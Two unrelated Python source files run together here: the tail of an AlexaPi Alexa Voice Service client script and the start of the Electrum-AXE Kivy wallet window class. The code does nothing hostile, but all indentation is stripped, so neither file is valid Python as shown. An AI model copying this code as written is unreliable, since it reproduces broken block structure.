# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests
# streamId Specifies the identifier for the current stream.
# offsetInMilliseconds Specifies the current position in the track, in milliseconds.
# playerActivity IDLE, PAUSED, or PLAYING
logger.debug("Sending Playback Progress Report Request...")
headers = {
'Authorization': 'Bearer %s' % token
}
data = {
"messageHeader": {},
"messageBody": {
"playbackState": {
"streamId": stream_id,
"offsetInMilliseconds": 0,
"playerActivity": playerActivity.upper()
}
}
}
if requestType.upper() == RequestType.ERROR:
# The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError"
elif requestType.upper() == RequestType.FINISHED:
# The Playback Finished method sends a notification to AVS that the audio player has completed playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished"
elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117
# The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle"
elif requestType.upper() == RequestType.INTERRUPTED:
# The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted.
# Note: The audio player may have been interrupted by a previous stop Directive.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted"
elif requestType.upper() == "PROGRESS_REPORT":
# The Playback Progress Report method sends a notification to AVS with the current state of the audio player.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport"
elif requestType.upper() == RequestType.STARTED:
# The Playback Started method sends a notification to AVS that the audio player has started playing.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted"
response = requests.post(url, headers=headers, data=json.dumps(data))
if response.status_code != 204:
logger.warning("(alexa_playback_progress_report_request Response) %s", response)
else:
logger.debug("Playback Progress Report was Successful")
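# Illustrative call (not part of the original flow): report that playback of a
# stream has finished. Assumes a RequestType.FINISHED constant and a stream_id
# obtained from a previous Play directive.
#
#   alexa_playback_progress_report_request(RequestType.FINISHED, 'finished', stream_id)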
def process_response(response):
logger.debug("Processing Request Response...")
if response.status_code == 200:
try:
data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n', 'utf-8') + response.content
msg = email.message_from_bytes(data) # pylint: disable=no-member
except AttributeError:
data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content
msg = email.message_from_string(data)
for payload in msg.get_payload():
if payload.get_content_type() == "application/json":
j = json.loads(payload.get_payload())
logger.debug("JSON String Returned: %s", json.dumps(j, indent=2))
elif payload.get_content_type() == "audio/mpeg":
filename = tmp_path + hashlib.md5(payload.get('Content-ID').strip("<>").encode()).hexdigest() + ".mp3"
with open(filename, 'wb') as f:
f.write(payload.get_payload(decode=True))
else:
logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type())
# Now process the response
if 'directives' in j['messageBody']:
if not j['messageBody']['directives']:
logger.debug("0 Directives received")
for directive in j['messageBody']['directives']:
if directive['namespace'] == 'SpeechSynthesizer':
if directive['name'] == 'speak':
player.play_speech("file://" + tmp_path + hashlib.md5(directive['payload']['audioContent'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3")
elif directive['namespace'] == 'SpeechRecognizer':
if directive['name'] == 'listen':
logger.debug("Further Input Expected, timeout in: %sms", directive['payload']['timeoutIntervalInMillis'])
player.play_speech(resources_path + 'beep.wav')
timeout = directive['payload']['timeoutIntervalInMillis'] / 116
audio_stream = capture.silence_listener(timeout)
# now process the response
alexa_speech_recognizer(audio_stream)
elif directive['namespace'] == 'AudioPlayer':
if directive['name'] == 'play':
player.play_playlist(directive['payload'])
elif directive['namespace'] == "Speaker":
# speaker control such as volume
if directive['name'] == 'SetVolume':
vol_token = directive['payload']['volume']
type_token = directive['payload']['adjustmentType']
if (type_token == 'relative'):
volume = player.get_volume() + int(vol_token)
else:
volume = int(vol_token)
if (volume > MAX_VOLUME):
volume = MAX_VOLUME
elif (volume < MIN_VOLUME):
volume = MIN_VOLUME
player.set_volume(volume)
logger.debug("new volume = %s", volume)
        # Additional audio item
elif 'audioItem' in j['messageBody']:
player.play_playlist(j['messageBody'])
return
elif response.status_code == 204:
logger.debug("Request Response is null (This is OKAY!)")
else:
logger.info("(process_response Error) Status Code: %s", response.status_code)
response.connection.close()
platform.indicate_failure()
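# Note on the response format handled above: AVS replies with a multipart body
# that process_response() parses with the email package. One part is JSON
# carrying the directives; any audio/mpeg parts are speech audio,
# cross-referenced from the JSON via their Content-ID headers and cached on
# disk as MD5-named mp3 files.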
trigger_thread = None
def trigger_callback(trigger):
global trigger_thread
logger.info("Triggered: %s", trigger.name)
triggers.disable()
trigger_thread = threading.Thread(target=trigger_process, args=(trigger,))
trigger_thread.setDaemon(True)
trigger_thread.start()
def trigger_process(trigger):
if player.is_playing():
player.stop()
# clean up the temp directory
if not debug:
for some_file in os.listdir(tmp_path):
file_path = os.path.join(tmp_path, some_file)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except Exception as exp: # pylint: disable=broad-except
logger.warning(exp)
if event_commands['pre_interaction']:
subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE)
force_record = None
if trigger.event_type in triggers.types_continuous:
force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad)
if trigger.voice_confirm:
player.play_speech(resources_path + 'alexayes.mp3')
audio_stream = capture.silence_listener(force_record=force_record)
alexa_speech_recognizer(audio_stream)
triggers.enable()
if event_commands['post_interaction']:
subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE)
def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument
triggers.disable()
triggers.cleanup()
capture.cleanup()
pHandler.cleanup()
platform.cleanup()
shutil.rmtree(tmp_path)
if event_commands['shutdown']:
subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE)
sys.exit(0)
if __name__ == "__main__":
if event_commands['startup']:
subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE)
try:
capture = alexapi.capture.Capture(config, tmp_path)
capture.setup(platform.indicate_recording)
triggers.init(config, trigger_callback, capture)
triggers.setup()
except ConfigurationException as exp:
logger.critical(exp)
sys.exit(1)
pHandler.setup()
platform.setup()
for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM):
signal.signal(sig, cleanup)
logger.info("Checking Internet Connection ...")
while not internet_on():
time.sleep(1)
try:
token = Token(config['alexa'])
if not str(token):
raise RuntimeError
except (ConfigurationException, RuntimeError):
platform.indicate_failure()
sys.exit(1)
platform_trigger_callback = triggers.triggers['platform'].platform_callback if 'platform' in triggers.triggers else None
platform.after_setup(platform_trigger_callback)
triggers.enable()
if not silent:
player.play_speech(resources_path + "hello.mp3")
platform.indicate_success()
while True:
time.sleep(1)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum_axe.bitcoin import TYPE_ADDRESS
from electrum_axe.storage import WalletStorage
from electrum_axe.wallet import Wallet
from electrum_axe.paymentrequest import InvoiceStore
from electrum_axe.util import profiler, InvalidPassword
from electrum_axe.plugin import run_hook
from electrum_axe.util import format_satoshis, format_satoshis_plain
from electrum_axe.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_axe.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_axe.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_axe.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_axe.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; a timeout of 0 means
# the cached data is kept forever.
Cache.register('electrum_axe_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_axe.gui.kivy.uix.screens')
# Register fonts. Without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_axe/gui/kivy/data/fonts/Roboto.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_axe/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_axe.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_axe import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'axe':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 8)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
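    # Worked example (illustrative, hypothetical unit name): if the unit table
    # maps 'mAXE' to 5 decimal places, then with base_unit == 'mAXE',
    # get_amount('1.5 mAXE') returns int(10**5 * 1.5) == 150000 base units.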
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Tracks the orientation the app is running in.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum-AXE App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_axe.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('axe:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_axe.transaction import Transaction
from electrum_axe.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_axe.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_axe.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.axe.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_axe/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))  # time.clock() was removed in Python 3.8
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for axe: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum-AXE: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_axe.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_axe.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_axe_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_axe_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-axe.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum_axe.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-AXE', message,
app_icon=icon, app_name='Electrum-AXE')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_axe/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_axe/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_axe/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
